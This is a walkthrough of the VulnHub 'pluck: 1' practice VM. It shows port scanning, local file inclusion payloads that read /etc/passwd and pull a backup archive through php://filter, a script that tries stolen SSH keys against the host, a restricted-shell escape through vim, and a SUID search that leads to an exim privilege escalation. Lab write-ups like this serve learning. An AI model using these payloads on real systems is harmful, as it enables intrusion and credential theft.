In this post we will walk through the pluck: 1 VM from VulnHub. Let's start!
Enumeration:
We will scan all TCP ports along with the top 100 UDP ports, then recheck SNMP (161/udp) and TFTP (69/udp) individually:
root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153 \
> && nmap -sU -sV -A --top-ports 100 192.168.17.153 \
> && nmap -sU -p 161 192.168.17.153 \
> && nmap -sU -p 69 192.168.17.153

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for 192.168.17.153
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for 192.168.17.153
Host is up (0.00061s latency).
Not shown: 98 closed ports
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00074s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00056s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
The website on port 80 is powered by PHP. After trying a number of PHP-specific tricks, it turned out that the page parameter of index.php is vulnerable to local file inclusion (LFI), and the php://filter base64-encode wrapper works too, which lets us read a file's raw contents as base64 instead of having PHP execute it or the browser mangle it. Reading /etc/passwd confirms the LFI:
http://192.168.17.153/index.php?page=/etc/passwd
Now we have a list of users (the interesting entries from /etc/passwd):
- bob
- peter
- paul
- backup-user
Exploitation
I tried brute-forcing and SQL injection against the admin login page, but with no luck.
Next I went back to the user list. The login shell of backup-user in /etc/passwd is not a normal shell but a backup script, so let's include that script through the LFI to see what it does:
http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh
We could include the tar file directly, but a raw tar archive dumped inside an HTML page is a total mess. Instead, we use the php://filter base64-encode trick to fetch the archive safely: the server returns the contents of backup.tar as base64, we cut the surrounding HTML away, and decode the result locally.
curl "http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar" | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup
After extracting the archive, we notice a keys folder containing several SSH private keys belonging to the user paul. We try the keys one by one until one gives a valid SSH login:
ssh paul@192.168.17.153 -i id_key4
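Trying the keys by hand works for a handful of files, but two things bite in practice: ssh refuses a private key whose mode is group- or world-readable (keys pulled out of a tarball often arrive that way), and without BatchMode it falls back to a password prompt on every failed key. The loop below is an added example, not from the original post; the user and host come from the page, while the key directory, the helper names and the SSH_CMD variable (which only exists so the loop can be exercised without a live target) are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): try every private key from the
# backup against the target non-interactively and report the first one that
# authenticates. SSH_CMD defaults to ssh; it is overridable only for testing.
set -u

SSH_CMD="${SSH_CMD:-ssh}"

# ssh rejects keys with loose permissions ("UNPROTECTED PRIVATE KEY FILE"),
# so normalise the mode before each attempt.
fix_key_perms() {
    chmod 600 "$1"
}

# Try one key. BatchMode makes ssh fail instead of prompting for a password,
# IdentitiesOnly stops it from offering agent keys instead of this one, and
# the remote command "true" keeps a successful login from opening a shell.
try_key() {
    user="$1"; host="$2"; key="$3"
    "$SSH_CMD" -o BatchMode=yes -o IdentitiesOnly=yes -o ConnectTimeout=5 \
        -o StrictHostKeyChecking=no -i "$key" "$user@$host" true >/dev/null 2>&1
}

# Iterate over candidate keys in DIR (skipping .pub halves) and print the
# first one that works; returns 1 if none does.
find_working_key() {
    user="$1"; host="$2"; dir="$3"
    for key in "$dir"/*; do
        [ -f "$key" ] || continue
        case "$key" in *.pub) continue ;; esac
        fix_key_perms "$key"
        if try_key "$user" "$host" "$key"; then
            echo "$key"
            return 0
        fi
    done
    return 1
}

# Live usage (the keys directory is wherever the backup was extracted):
#   key="$(find_working_key paul 192.168.17.153 /path/to/extracted/keys)" \
#       && ssh -i "$key" paul@192.168.17.153
```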
Once logged in, we land in a menu-driven login shell, in this case pdmenu, rather than a normal shell. We can escape it by choosing the "Edit file" entry and typing any file name, which opens vim. From vim, set the shell option:
:set shell=/bin/bash
Then drop to Bash with the following (`:!/bin/bash` from vim does the same in one step):
:shell
Privilege Escalation
I tried kernel exploits first, with no luck. Searching for SUID binaries, however, reveals a non-standard exim installation under /usr/exim, with the version baked into the file name:
paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
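Most of the listing above is the stock set of setuid helpers that every Ubuntu install ships, so the real question is which entries were added by hand. The script below is an added example, not from the original post: it filters a setuid listing by whether each binary lives under a package-managed prefix and, where dpkg is available, whether any package actually owns it. The prefix list is an assumption about Ubuntu's layout; the sample input in the test is copied from the page's find output.

```shell
#!/bin/sh
# Added example (not from the original post): separate stock setuid binaries
# from hand-installed ones. Prefix heuristic is an assumption about Ubuntu;
# the dpkg ownership check only runs when USE_DPKG=1 and dpkg exists.
set -u

USE_DPKG="${USE_DPKG:-0}"

# Package-managed locations on Ubuntu. A setuid file anywhere else
# (/usr/local, /opt, a vendor tree like /usr/exim) was not installed by apt.
is_stock_prefix() {
    case "$1" in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Ask dpkg whether some package owns the file; returns 1 for unpackaged
# files and also when dpkg is not present at all.
is_packaged() {
    command -v dpkg >/dev/null 2>&1 || return 1
    dpkg -S "$1" >/dev/null 2>&1
}

# Read setuid paths on stdin and print the suspicious ones: outside the
# stock prefixes, or (with USE_DPKG=1) inside them but owned by no package.
suid_triage() {
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        if ! is_stock_prefix "$f"; then
            echo "$f"
        elif [ "$USE_DPKG" = 1 ] && ! is_packaged "$f"; then
            echo "$f"
        fi
    done
}

# Live usage on the target (-perm -4000 is the same test as -perm -u=s):
#   USE_DPKG=1; find / -perm -4000 -type f 2>/dev/null | suid_triage
```

On the pluck VM the prefix check alone singles out /usr/exim/bin/exim-4.84-7; the dpkg pass additionally catches binaries that were dropped into /usr/bin by hand, which the prefix check would miss.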
I tried several exim exploits to escalate privileges, but they did not work for me. I decided to give this exploit a shot anyway, since the version difference is minimal, and luckily it works.
Flag:
And that's it.